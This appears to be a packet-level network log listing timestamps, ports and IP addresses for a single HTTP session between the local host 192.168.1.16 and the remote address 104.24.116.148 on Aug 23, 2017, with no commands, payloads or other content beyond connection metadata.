Aug 23, 2017 11:21:36.553915977 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.553946972 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.554234982 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:36.554275990 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.563050032 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.563086987 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.563410997 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:36.563451052 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.569036007 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.569065094 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.569324017 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:36.569366932 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.581264973 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.581296921 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.581305981 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.581608057 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:36.581648111 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.584126949 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.584155083 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.584392071 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:36.584449053 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.593059063 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.593095064 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.593410969 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:36.593451977 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.601972103 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.601994991 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.602386951 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:36.602421045 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.614573002 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.614604950 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.614928961 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:36.614964008 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.621088982 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.621387005 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:36.621434927 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.636063099 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.636324883 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:36.636348009 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.644012928 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.644064903 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.644227028 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:36.644248962 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.650850058 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.650885105 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.651180029 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:36.651243925 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.660151005 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.660190105 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.660535097 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:36.660615921 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.667740107 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.667784929 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.668107986 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:36.668186903 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.680706978 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.680756092 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.681088924 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:36.681137085 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.687455893 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.687493086 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.687755108 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:36.687797070 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.689141035 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.689168930 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.689374924 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:36.689414024 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.700238943 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.700601101 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:36.700651884 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.706131935 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.706178904 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.706413984 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:36.706454992 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.734621048 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.734662056 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.735006094 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:36.735064030 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.762248039 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.762465000 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:36.762501955 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.764754057 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.764784098 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.764924049 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:36.764940023 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.784454107 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.784497976 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.784616947 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:36.784636974 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.787806988 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.787837029 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.787950993 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:36.787969112 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.800508022 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:36.802807093 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.802831888 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.802990913 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:36.817588091 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.817620039 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.817739010 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:36.828118086 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.828145027 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.828161001 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.828296900 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:36.832423925 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.832489967 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.832504034 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.832587004 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:36.850445032 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.850476980 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.850493908 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.850605965 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:36.852605104 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.852634907 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.852652073 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.852747917 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:36.867494106 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.881341934 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.881553888 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:36.881577015 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.888659000 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.888765097 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:36.888784885 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.914697886 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.914727926 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.915044069 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:36.915061951 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.918967962 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.918977022 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.919099092 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:36.919123888 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.934154987 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.934175968 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.934314966 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:36.934338093 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.939954042 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.939973116 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.940108061 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:36.940130949 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.961113930 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.961138964 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.961199999 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:36.961222887 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.967274904 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.967299938 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.967592955 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:36.967616081 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.977067947 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.977092981 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.977166891 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:36.977189064 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.984057903 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.984081030 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:36.984165907 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:36.984189034 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.000122070 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.000144958 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.000222921 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.000246048 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.005273104 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.008285999 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.024514914 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.024540901 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.024666071 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.024698019 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.025161028 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.025178909 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.025257111 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.025274992 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.040288925 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.040303946 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.041620970 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.041640997 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.053426027 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.053455114 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.053579092 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.053606033 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.073213100 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.073239088 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.073250055 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.073266983 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.073277950 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.073383093 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.073406935 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.092597008 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.092626095 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.092637062 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.092778921 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.092797041 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.092813015 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.092875957 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.096524954 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.113715887 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.115004063 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.125674963 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.125696898 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.125823021 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.125871897 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.129740000 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.129940033 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.129991055 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.149918079 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.150141954 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.150197983 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.160504103 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.160528898 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.160665035 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.160712004 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.164788008 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.164810896 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.164918900 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.164944887 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.179363966 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.179389000 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.179501057 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.179542065 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.183573008 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.183595896 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.183701992 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.183737040 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.204004049 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.204026937 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.204164028 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.204197884 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.210944891 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.210968018 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.211065054 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.211102009 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.219822884 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.219845057 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.219954967 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.219990969 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.226172924 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.226196051 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.226283073 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.226315022 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.242805958 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.242826939 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.243132114 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.243154049 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.249871016 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.249972105 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.249993086 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.264789104 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.265171051 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.265202045 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.271887064 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.271905899 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.272155046 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.272185087 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.279278994 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.279299021 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.279628038 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.279659033 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.285137892 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.285161972 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.285271883 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.285303116 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.288357019 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.288377047 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.288764000 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.288783073 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.300726891 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.300749063 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.300987005 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.301007032 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.306691885 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.306709051 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.306929111 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.306956053 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.310559034 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.310575962 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.310687065 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.310715914 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.327670097 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.327688932 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.327842951 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.327879906 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.328680992 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.328699112 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.328875065 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.328907967 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.346204996 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.346224070 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.346384048 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.346421003 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.351809978 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.351829052 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.351932049 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.351952076 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.363863945 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.363890886 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.363985062 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.364006042 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.370754004 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.370775938 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.371038914 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.371108055 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.371274948 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.371301889 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.371570110 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.371602058 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.391885042 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.391911030 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.392119884 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.392158031 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.398377895 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.398401976 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.398597956 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.398636103 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.398861885 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.398885965 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.399025917 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.399055004 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.418708086 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.418922901 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.418961048 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.425163984 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.425380945 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.425419092 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.433562994 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.433584929 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.433780909 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.433818102 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.439966917 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.439990044 MESZ	80	49196	104.24.116.148	192.168.1.16
